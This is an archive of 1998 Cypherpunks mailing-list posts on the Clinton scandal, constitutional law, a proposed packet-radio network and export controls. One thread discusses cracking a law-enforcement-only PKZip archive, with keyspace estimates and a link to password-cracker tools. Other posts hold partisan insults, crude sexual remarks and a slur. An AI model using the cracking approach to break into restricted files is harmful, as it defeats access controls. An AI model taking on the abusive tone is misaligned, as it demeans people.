> http://www.mosexpo.ru/svyaz98
> Flowers and Seed
> http://www.mosexpo.ru/flowers
> Fishing
> http://www.mosexpo.ru/fishing
> and more in http://www.mosexpo.ru
>  
> To delete itself from list enter come in on server http://www.mosexpo.ru/rus
> there  Remove mailing list
> info@mosexpo.ru
> 7-095-974-7568
> 
> 
> 
> 
> This is a demo version of Dynamic Mail Server -
> the leading Internet marketing promotion tool -
> More details at: http://www.dynamicmail.com/
> -----------------------------------------------------
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 12 Sep 1998 13:37:46 +0800
To: cypherpunks-unedited@toad.com
Subject: Deletion test
Message-ID: <199809121851.NAA17371@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text




Deletion test


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 12 Sep 1998 16:07:31 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <199809121625.LAA15937@einstein.ssz.com>
Message-ID: <3.0.5.32.19980912140527.007d2ad0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:25 AM 9/12/98 -0500, Jim Choate wrote:
>Forwarded message:
>
>What part of:
>
>High crimes and misdemeanors don't you understand?
>
>Oh, and it isn't 'high misdemeanors'...

There is no evidence that Clinton actually *inhaled* on the
flavored cigar...










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?ISO-8859-1?Q?M=F6ller?=)
Date: Sat, 12 Sep 1998 07:48:06 +0800
To: cypherpunks@toad.com
Subject: Re: A Cypherpunk Trial, Yes
In-Reply-To: <D104150098E6D111B7830000F8D90AE824063F@exna02.securitydynamics.com>
Message-ID: <m0zHoXF-001C8AC@idril.shnet.org>
MIME-Version: 1.0
Content-Type: text/plain



> 	in all kinds of nefarious activities.  The same
> 	post also names Tim May, Adam Back, Declan
> 	McCullagh, Ulf Moller, Kent Crispen, and Blanc
> 	Weber. I'm let off easy, being characterized 
> 	as only a 'terroist [sic] InterNet forger'. 
> 	I think that this is because I once complained 
> 	when someone (possibly Toto) forged a message 
> 	in my name.

Hm. I hadn't seen that before.

I didn't forge any messages or complain about forgeries, and I haven't
claimed to have been working on proving the validity of the need for
legislation declaring the value of Pi to be 3.0, either. If there is
any truth in the Nutly News, it must be something else. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian W. Buchanan" <brian@smarter.than.nu>
Date: Sat, 12 Sep 1998 16:37:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Investigating the Suspect Computer
In-Reply-To: <199809121910.PAA03207@camel14.mindspring.com>
Message-ID: <Pine.BSF.4.02A.9809121417000.254-100000@smarter.than.nu>
MIME-Version: 1.0
Content-Type: text/plain



> THIS PACKAGE IS DISTRIBUTED TO LAW ENFORCEMENT AND 
> PRIVATE INVESTIGATORS ONLY!!  THE ARCHIVE FILE IS [PKZip] 
> ENCRYPTED, AND YOU WILL NEED A PASSWORD TO EXTRACT
> THE ARCHIVE.  IF YOU ARE NOT WORKING IN LAW ENFORCEMENT, 
> DON'T BOTHER TO DOWNLOAD THE FILE, WE WILL NOT DISTRIBUTE 
> THE PASSWORD UNLESS WE CAN VERIFY YOUR CREDENTIALS. 

6161234432565677 possibilities for up to 8 printable-characters (roughly 2^52)

217180147133 poss. for up to 8 lowercase letters (roughly 2^38)

54507958502609 poss. for up to 8 lower/upper letters (roughly 2^46)

221919451578029 poss. for up to 8 alphanumeric chars. (roughly 2^48)

Apparently, the password can be up to 80 printable characters in length...

715934338421370680344382998236434541670979942120825502830105586745112050\
939906381266091474511676185877408805164512571770773165479768270778933665\
90119714237357 possibilities worst-case (roughly 2^524)

According to one of the READMEs that comes with a public domain
implementation of the PKZIP crypto algorithm, there is a known-plaintext
attack against it described at http://www.cryptography.com/.

If it's 8 or less lower-case letters, it would seem that it's probably
crackable in a reasonable amount of time on a high-end desktop PC or
workstation.  Anything more would probably require a distributed attack.

-- 
Brian Buchanan                                      brian@smarter.than.nu

Never believe that you know the whole story.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Sep 1998 14:10:00 +0800
To: cypherpunks@cyberpass.net
Subject: Investigating the Suspect Computer
Message-ID: <199809121910.PAA03207@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Is there a PKZip-encryption cracker online for the 
following program which claims to offer a link to a 
couple of dozen shareware password crackers of
popular programs?  The exe-file is easily downloaded. 
There's a copy for testing for privacy protection:

   http://jya.com/pci-pack.exe (20K)


Investigating the Suspect Computer
PC Data Recovery for the Criminal Investigator
Law Enforcement Use Only

   http//www.forensicdynamics.com/pccrime.htm

WHAT EXACTLY, DOES THE SOFTWARE DO ? 

The software is designed to almost completely automate
the formidable task of extracting forensic data from
today's modern personal computers with large or multiple
hard drives. The program automatically examines startup
files for "booby traps", and searches the entire machine
for "bomb" programs which, if triggered, could destroy
valuable evidence on the machine. PC-Investigator runs
exclusively from diskette, at the DOS level, and does
NOT perform any write operations to the hard drive. This
insures that fragile data, or files that may be evidence
which have been deleted, or are resident in "slack
space", are not inadvertently overwritten. 

A unique feature of the software is the ability to construct
custom-tailored reports. The catalog function extracts
and organizes all the files on the hard drive, and sorts
them into order by type, date and time, according to
directory. During this process, all the readable (text) files
are extracted into a separate list, and are organized by
type in the report. Also available is an extracted report
listing of graphic (picture) files, and files that are 
typically used on the Internet, along with an extracted list 

of word processor files, backup files, ASCII text, and files 
that are recovered by CHKDSK or SCANDISK, which are
commonly overlooked as a source of forensic evidence. 

PC-Investigator has unique features that duplicate the
manual functions normally performed during such
forensic investigations. The most valuable feature is the
ability to search all the files on the disk for the presence
of up to 600 words or phrases called HotWords, that you
supply in an editable file. This function is the equivalent
of the manual process of "Find Files and Folders" / "Files
Containing" under Windows 95 , which typically takes
30 seconds to 3 minutes to do manually for each word or
phrase you are looking for. The function is performed
using words and phrases from the HotWord list,
hundreds of times per second.

A typical 2 Gigabyte hard drive may contain over 500
readable text files. A manual search for the occurrence of
a single word or phrase occurring in those files typically
takes 90 seconds. If you had to search for those 200
words manually, the time required would be  5 hours at
the keyboard. The HotWord search feature of PC-

Investigator performs this function on a 486/50 machine
in just under 45 minutes. If the number of files to be
searched is substantially higher, such as on today's large
hard drives (typically 2 to 4 Gigabytes, with 12 Gigabyte
drives available on top-end systems) the time required to
perform an exhaustive search would be proportionately
higher (500 to 1,000 man-hours). PC-Investigator
completely searches a 2 Gigabyte drive n a 486/120
machine in just under 24 hours. The faster the processor,

and hard disk controller, the faster the program will run to
completion. 

The best part is that each file containing any of the words
or phrases in your list is cataloged in the report, along
with the number of "hits" or HotWords found in the file.
After the program is started, and the desired options are
selected, the program will run un-attended, doing the
work that would normally not be done in such cases
because of the tremendous amount of time and effort
involved. Of course, files which do not contain "clear
text", or are DES or BLOWFISH / PGP encrypted will not
be flagged by the program. However, we have software
which addresses the problem of APPLICATION
encryption - that is - files which are encrypted by the
application which created them. For example, LOTUS
123, Quick Books, PFS Professional, and WordPerfect
are among the few programs which offer in-application
encryption of files. 

The program does NOT extract or examine the data from
"slack space". However, running the program is easy,
and can be done by almost anyone with a bit of computer
skills. The software is designed as a preliminary
investigative tool, to determine if a machine should be
examined by a professional. If this program indicates a
"HOT" machine, you can be certain that a more
extensive investigation is warranted. 

             -----

PCI-PACK.EXE 

Includes PC-Investigator software, manual and
Investigating The Suspect Computer 

THIS PACKAGE IS DISTRIBUTED TO LAW ENFORCEMENT AND 
PRIVATE INVESTIGATORS ONLY!!  THE ARCHIVE FILE IS [PKZip] 
ENCRYPTED, AND YOU WILL NEED A PASSWORD TO EXTRACT
THE ARCHIVE.  IF YOU ARE NOT WORKING IN LAW ENFORCEMENT, 
DON'T BOTHER TO DOWNLOAD THE FILE, WE WILL NOT DISTRIBUTE 
THE PASSWORD UNLESS WE CAN VERIFY YOUR CREDENTIALS. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 12 Sep 1998 17:49:36 +0800
To: jimg@mentat.com (Jim Gillogly)
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809121549.IAA28683@zendia.mentat.com>
Message-ID: <199809122249.PAA03858@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Jimmy: the "sockpuppets" (as Lucien Goldberg calls them) who
defend clinton on TV (and are probably paid to)
are trying to advance the case that
lying in a civil case is rarely prosecuted, which is true, 
but has nothing to do with the law. apparently clinton & his
slimy lawyer teammates would tend to reassure all the women, such 
as Gennifer Flowers as I recall, that they could lie without
consequence in a civil trial.  at least those women whom they
didn't threaten to "break their pretty legs". a capricious
bunch, hmm?

also, there
may be some legal precedent that unless the lying had
to do with the case, it is not relevant to the case
(a reasonable situation I wouldn't be surprised if some
judge ruled)

but there's just no laws, as I understand it, that ever
allow lying under any circumstances, particularly in sitations
such as court hearings, depositions, etc.  in fact it can be
argued our whole legal system breaks down if lying is ever
sanctioned in any way. that's the problem. weasel clinton 
will always be looking for a loophole. I'm surprised you
gave the slightest credibility to claims that lying is
ever sanctioned under the law. 

there are a lot of paid-lowlife tentacles making the television circuit
defending clinton, I suspect. you've fallen prey to one of their
arguments.  he would have been trashed
long ago if it weren't for their thick, odious & treacherous
smokescreens, imho. there are a lot more traitors in this
country than Clinton, for sure. they all hang out together,
but few sheeple will ever know.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 12 Sep 1998 15:29:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: 2A (fwd)
Message-ID: <199809122052.PAA17723@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 11 Sep 1998 22:00:12 -0400
> From: David Miller <dm0@avana.net>
> Subject: 2A

> The thought I had (actually, it was explained to me), about the
> BoR is that, you know that in contracts/law, if there is a conflict
> within a text/body of law, that which was legally written last
> overrides the earlier statement.  (e.g. the fine print is always
> at *the bottom* of contracts).  Think:  a law is passed saying
> that something is legal, now another one is passed saying that it
> is illegal... Which law wins?  The second one, obviously, so long
> as it was legally passed.

Contract law is civil law, the Constitution isn't civil law it is the
charter defining how the government is supposed to work. If we accept this
then no part of the Constitution is safe because it could be over-ridden
this way, clearly not what the founding fathers intended in practice or
principle.

> Well, same with the BoR/Admendments.  As AMENDMENTS, they override
> the main body of the Constitution, if there is a conflict.  This
> is plain, simple, contractual law, and holds anywhere that people
> negotiate contracts.
> 
> Consider:  The main body of the C says that the Senate can ratify
> treaties, such as the UN resolution to confiscate privately-owned
> small arms.  Yet there is the 2A.  Which wins?  The 2A because it
> is the overriding law of the land, higher than the authority of
> the main body of the C to give the Senate that power when there is
> a conflict between parts of the law.
> 
> Conclusion:  The UN should get your guns and ammo one bullet at a
> time.

This is lawyer bullshit, the 10th states very clearly, as well as the
last sentence of the inter-state commerce clause, that the Constitution has
to be taken in toto. The legislators and courts don't get to pick and choose.

Furthermore, since the amendments dealing with prohabition were passed prior
to the 16th they set a precedence that requires that subsequent amendemnts
must specify what they are changing, the 16th doesn't do that. One could
argue on that alone that the 16th as currently worded is invalid since it
didn't meet prior precedence and by extension wasn't passed legaly.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 12 Sep 1998 16:32:55 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Ooops...16 is before 18th & 21st
Message-ID: <199809122156.QAA18031@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Ooops, guess I was in some sort of fugue and forgot how to count...

Clearly the 16th is before the 18th or 21st amendments.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 12 Sep 1998 16:45:54 +0800
To: "Ryan Lackey" <cypherpunks@Algebra.COM>
Subject: Re: radio net
Message-ID: <199809122147.RAA23457@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 9/8/98 2:29 PM, Ryan Lackey (ryan@systemics.ai)  passed this wisdom:


>Is anyone else interested in setting up a radio net (probably packet radio
>relay) to relay small quantities of data in the event the telecommunications
>infrastructure becomes unavailable (either technically or 
>legally/politically/militarily)?  There are existing packet relay nets, but 
>in my experience amateur radio people, especially in the US, are very 
>willing to roll over for the government at the slightest cause.

 you tar with too wide a brush ... one of the pioneers of ham packet 
radio is Phil Karn, who definitely isn't in to submissive roll overs! For 
that matter neither am I, though, sadly the greater number of hams do fit 
your description.

>I think the cost would be something like $1-5k per station, and it could
>be done in a fairly turnkey fashion.  Exactly how to handle routing and
>what protocol to use on the network is kind of an open question -- there
>are a lot of solutions, none of them optimal.

 so what are you interested in setting up????


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "One of the deep mysteries to me is our logo, the symbol of lust
   and knowledge, bitten into, all crossed with in the colors of the
   rainbow in the wrong order. You couldn't dream of a more 
   appropriate logo: lust, knowledge, hope, and anarchy."
   -- Gassee - Apple Logo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 12 Sep 1998 21:16:36 +0800
To: cypherpunks@Algebra.COM
Subject: Clinton--Why I am Chortling
In-Reply-To: <199809121625.LAA15937@einstein.ssz.com>
Message-ID: <v03130300b220d70c14e9@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain




I've seen several Cypherpunks express the opinion that can be summarized as
"We paid $40 million for _this_?" And "Ken Starr is on a witch hunt."

Indeed, a lot of money spend by the Independent Prosecutor. And Starr is
indeed a Grand Inquisitor.

But he is following the law, and Attorney General Janet Reno authorized his
latest venture.

I'm generally pleased with what's happening. Many points to make:

* What goes around, comes around. The Liberal puke Democrats who crucified
Bob Packwood, Clarence Thomas, and any number of corporate people charged
with "sexual harassment," are now reaping what they sowed. "If she says it
happened, it happened," the mantra of the feminazi left, is now apparently
forgotten by Patricia It's not our business" Ireland.

* And it was the Dems who pushed through the Independent Prosecutor Act (or
whatever the precise name is). They've reaped the whirlwind, as it were.

* Lawmaking is paralzyed, frozen, stillborne. This I count as a Good Thing.
Even better will be another 8-10 months of this nightly spectacle. No
Health Care Reform, no Communications Decency Act II, no Tobacco Act,
nothing.

(By the way, a danger will be having Republicans sweep into power in
November and then making mischief about morality, new laws about crypto and
terrorism, etc.)

* Clinton is of course shown to be a liar, a perjurer, a suborner of
perjury, an abuser of his office, and a duplicitous jerk who spouts NOW
mantras while doing what any CEO in America would be fired and sued over.
(Not that I support any such lawsuits.)

* This disgraces the Presidency, which I also count as a Good Thing. There
were hopes that Nixon's downfall would be the end of the Imperial
Presidency, but, alas, the pomp and circumstance continued unabated. It's
time we demystify this whole President thing and start asking why the fuck
we should let some tinhorn politician spend our money.

* Children will be taught that the President is a liar, adulterer, creep,
jerk, fool, pervert, and general scumbag. (A friend of mine has been
pointing out to his 10-year-old son that Clinton is a lying piece of dog
shit, a monster who professes to lead us all morally while poking cigars in
Monica's cunt and then going to church to piously opine about the need for
values....not that the cigar thing is ipso facto immoral, just at odds with
his "family values" nonsense.

* Let us all hope this "does not go to completion" (ha ha) for many, many
months. Let us hope all see that this nation of laws is built on lies and
perjurious talking points.

* I know that if I'm called to testify in court I'll be sorely tempted to
say: "As for telling the truth, I plan to follow the example of the
President."

Ironically, this situation is now so well known that such a statement would
almost certainly be taken by a judge today as contempt of court. And yet we
put up with having this lying sack of shit in the White House.

I am chortling.

--Tim May


(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 12 Sep 1998 19:07:38 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: radio net (fwd)
Message-ID: <199809130029.TAA18636@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: radio net (fwd)
> Date: Sat, 12 Sep 1998 20:03:56 -0400
> From: "Brian B. Riley" <brianbr@together.net>

> open for things like the ham radio satellite command channel uplinks 
> being encrypted for security reasons ... but to do so they must, upon 

Actualy the control channel for satellites must be encrypted by
international law.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Sat, 12 Sep 1998 21:56:21 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: Clinton's fake apologies
In-Reply-To: <Pine.GSO.3.95.980911095344.7166D-100000@well.com>
Message-ID: <000301bddec2$d088f460$238195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Bill Clinton, via  WASHINGTON (Reuters):

: 	First, I want to say to all of you that, as you might imagine, I
: have been on quite a journey these last few weeks to get to the end
: of this, to the rock bottom truth of where I am and where we all are.


But we are not the ones whose direction (moral compass?) is in question, as we're not all
in this together.  We only found out about it in Jan/February.


: I agree with those who have said that in my first statement after I
: testified I was not contrite enough.  I don't think there is a fancy
: way to say that I have sinned.


i.e.:   Now that there was unavoidable evidence of a DNA match, and in view of 23 boxes of
a report distributed to everyone in Congress and everyone else in the whole world, it's
time to look more seriously repentant, in an off-hand sort of way.   (memory:  "I hope
things go well for her."  For HER ! )


: 	It is important to me that everybody who has been hurt know that
: the sorrow I feel is genuine: first and most important, my family;
: also my friends, my staff, my Cabinet, Monica Lewinsky and her
: family, and the American people.  I have asked all for their
: forgiveness.

He wasn't hurting in January.  Nor in February, March, April, May, June, July . . .


: 	But I believe that to be forgiven, more than sorrow is required
: -- at least two more things.  First, genuine repentance -- a
: determination to change and to repair breaches of my own making.  I
: have repented.


Since his sex life is personal, and nobody really cares as long as it doesn't affect his
Presidential duties, why would anybody care that he's repentant?  (don't tell me, I know.
. .)


:Second, what my bible calls a "broken spirit"; an
: understanding that I must have God's help to be the person that I
: want to be; a willingness to give the very forgiveness I seek; a
: renunciation of the pride and the anger which cloud judgment, lead
: people to excuse and compare and to blame and complain.


To excuse and compare and to blame who?  What makes him think anyone will be blaming him
for doing anything wrong?  He didn't think it was wrong for 3 or so years with Monica.
Nor for 10 or so years with Jennifer.  What would make it wrong now, at this "particular
moment in time. . . ."


: 	Now, what does all this mean for me and for us?  First, I will
: instruct my lawyers to mount a vigorous defense, using all available
: appropriate arguments.  But legal language must not obscure the fact
: that I have done wrong.

Legally defensible; morally indefensible.  Any relation?


:Second, I will continue on the path of
: repentance, seeking pastoral support and that of other caring people
: so that they can hold me accountable for my own commitment.


Because of his proven "pattern" of straying from the "path of righteousness".


: 	Third, I will intensify my efforts to lead our country and the
: world toward peace and freedom, prosperity and harmony, in the hope
: that with a broken spirit and a still strong heart I can be used for
: greater good, for we have many blessings and many challenges and so
: much work to do.
: 	In this, I ask for your prayers and for your help in healing our
: nation.


But it is not we need healing, being it not we, are sick.


:And though I cannot move beyond or forget this -- indeed, I
: must always keep it as a caution light in my life -- it is very
: important that our nation move forward.

He and his counsel keep saying this ("put it behind us", "move on", "move forward"), as
though trying to erase it from view - to obfuscate what has become apparent and continue
as though there was not something going on; something which seems to need "healing".  Yet
Starr keeps pressing on; on and onward.

It is ironic, in these times of absurd laws being created by both sides in government,
legislation advanced and supported by all manner of political interest groups, that lately
these creations of theirs come back to bite them.   Had there been no laws regarding
"sexual harrassment in the workplace", the Jones case would not have come up, Monica would
not have been brought into the picture, and Clinton would not have had to ever worry about
being revealed for his "not-illegal" behavior.

Contradictions abound in this situation:

.  everyone should have a private life -  but you're not supposed to do it in the
Whitehouse (that holy place of morally superior governing operations); in particular,
while you're discussing "matters of greater importance to the nation" on the phone

.  having sex is not illegal, when it's between consenting parties  -  but you're not
supposed to cheat on your spouse, in particular if you're a Christian (Baptist?) who goes
to Church every Sunday and worships the source of the 10 Commandments

.  people are saying that the sex acts were "horrible" and "nasty" and "disgusting"  -
like they themselves would *never* think of doing equally lascivious things to each other
(like, who are they kidding)

.  whose fault is it that Ken Starr was assigned to hound down Clinton, and that it took
so long to get to this point?  Who was stalling, who needed to tell the truth, why was
Clinton unavoidably *obligated* to tell the truth?   How paradoxical that an inveterate
liar (according to his reputation) would have put himself in a position where legally,
according to the law, the law of this Nation which he supports and leads into the Future,
he is required  to reveal the truth, even when decency would say that one should not be
coerced into self-incrimination over a personal, private matter, and should not have to
confess such things.

Deep irony, for times like these . . .

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 12 Sep 1998 19:05:14 +0800
To: "Jim Choate" <cypherpunks@einstein.ssz.com>
Subject: Re: radio net (fwd)
Message-ID: <199809130003.UAA29856@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 9/9/98 8:39 AM, Jim Choate (ravage@einstein.ssz.com)  passed this 
wisdom:

>Forwarded message:
>
>> Date: Wed, 09 Sep 1998 00:51:49 -0700
>> From: "William J. Hartwell" <billh@ibag.com>
>> Subject: Re: radio net
>
>> I think a radio network linked to the Amateur networks sending secure
>> packets, 
>> using tunneling or maybe just encrypted traffic (There may be some FCC
>> rules regarding this.
>
>The FCC prohibits the transmission of encrypted data via analog or digital
>signals by amateurs.

 The FCC prohibits the use of transmissions encoded specifically to 
obscure the content of the traffic (which is exactly what our reason for 
using encryption would be), in essence they prohibit using encrypted 
transmisions. However, by wording the ruling that way they leave the door 
open for things like the ham radio satellite command channel uplinks 
being encrypted for security reasons ... but to do so they must, upon 
request, be able to provide the Friendly Chocolate Company with their 
keys.


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "For every action, there is an equal and opposite criticism."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 12 Sep 1998 19:26:34 +0800
To: "Robert Hettinga" <cypherpunks@Algebra.COM>
Subject: Re: radio net
Message-ID: <199809130024.UAA12462@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 9/10/98 10:28 PM, Robert Hettinga (rah@shipwright.com)  passed this 
wisdom:

>Hey, guys,
>
>Someone here already said it, but nobody else got it, so I'll repeat it:
>SSB, or Single Sideband. It's commercial ham radio, if you will, and all
>the ships use it. I expect that you can shove anything down an SSB set that
>you want, including encrypted traffic.
>
>Ham radio is a government nerd subsidy, and as such, doesn't do much but
>make more government funded/sactioned/approved/whatever nerds. :-).
>
>SSB would do just fine. It's an international standard, after all, and
>probably not under the control of any one government, even.e

 Bob, I am afraid you are showing your ignorance here. SSB is just one of 
the many modes of emission standardized in radio communications, its used 
by the amateur radio service (ham) , the citizens radio service (cb), the 
military, etc ...

 The real problem is that to build any sort of network would require some 
fixed positions, which, if it were intended to be 'clandestine' would be 
compromised sooner or later ... either that or several poor shnooks would 
have full time jobs driving vans around and around to keep the RDF snoops 
guessing ...

 In general there would be a better chance of pulling it off if you 
stayed away from the ham radio bands. 'self-policing' is not a character 
of another bands except the commercial broadcast bands.

 Spread spectrum would have more promise as many stations could be on the 
air at once on the same frequency thus making life quite confusing for 
the T-hunters. 


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

   "I would rather be exposed to the inconveniences attending too 
    much liberty than those attending too small a degree of it." 
      -- Thomas Jefferson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 12 Sep 1998 13:24:17 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Access to Eudora Export Controlled Archives
Message-ID: <199809121825.UAA20834@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 11 Sep 1998, Eudora Export Control Team wrote:

> Be sure to keep this username and password to yourself.  If someone 

You know, this kind of crap never ceases to make me chuckle. Mail a list
with thousands of people, which is archived all over the place, and add in
"Be sure to keep this username and password to yourself."

This is very effective export control.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 12 Sep 1998 22:39:33 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <v03130300b220d70c14e9@[209.66.100.110]>
Message-ID: <v03130302b220ed5350b9@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:11 PM -0700 9/12/98, Duncan Frissell wrote:
>At 07:18 PM 9/12/98 -0700, Tim May wrote:
>>
>>I've seen several Cypherpunks express the opinion that can be summarized as
>>"We paid $40 million for _this_?" And "Ken Starr is on a witch hunt."
>
>Ken Starr is investigating 5 separate Clinton criminal conspiracies.  Walsh
>took 7 years and $60megs to investigate Iran/Contra (two criminal
>conspiracies).
>
>I like it when the rulers are consumed by their own creations.
>
>DCF
>
>Extra credit awarded for naming Starr's 5 investigations.

Let's see:

-- Whitewater and Madison Guarantee (may be 2 separate investigations)

-- Filegate (White House had 1100 FBI files, overseen by Craig the Bar Bouncer)

-- Travelgate (replacing the old staff is kosher, but accusing them of
crimes is not)

-- Cigargate

And of course there were and are investigations of Ron Brown, Hazel
O'Leary, Ron Espe, Henry Cisneros, and nearly every one of the "rainbow
coalition" he installed...seems only the honkies are not being
investigated, which says either there's a coincidence, or the honkies are
getting a pass, or the minorities he put in were your basic political graft
appointees.

I'd say that a President who lives by the sword will die by the sword, but
this might get me a visit by one of his pimps, er, Secret Service stooges.
They grep for "President" and "die" in the same paragraph and have no
understanding of allusions.

--Tim May


(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 12 Sep 1998 19:59:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Investigating the Suspect Computer
In-Reply-To: <Pine.BSF.4.02A.9809121417000.254-100000@smarter.than.nu>
Message-ID: <199809130056.UAA05048@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



There's a batch of PKZip and other program cracker tools at:

   http://www.theargon.com/tools.html

With links to other sites, which link to more, into the dark psychoses
of Trans-Ural and Andean regions -- some of the DNS's are off the
charts.

Even so, none seem to work on the pci-pack.exe I grabbed, at least
not for me. The file may not be complete, or it's a decoy, or all the
vile crackers I unzipped are DIRT-virii death-writhing in my unzapped 
prostate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 12 Sep 1998 23:25:05 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: radio net (fwd); RAND '64
In-Reply-To: <199809130029.TAA18636@einstein.ssz.com>
Message-ID: <3.0.5.32.19980912212340.007c3670@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



On a radio data network: 

See http://www.rand.org/publications/RM/RM3762/


In this Memorandum we consider something we have earlier referred to as
"poor-boy" microwave. The "poor-boy" designation resulted from an imposed
constraint on the design of an ensemble of microwave communications
equipments--namely, that the designer should have to pay for the system out
of his own pocket! Even so, a look at price tags for anything to do with
any large electronic or communications system would appear to render the
term "poor-boy" inappropriate. "Mini-cost," a contraction of
"minimum-cost," now seems more fitting.

Mini-cost microwave, therefore, is a minimum-cost, line-of-sight microwave
communications system designed to transmit digital information in as
inexpensive a manner as possible. It is one way of building the links for
the proposed Distributed Adaptive Message Block communications system with
which this series of Memoranda is concerned.

The distributed system itself is designed around digital modulation, using
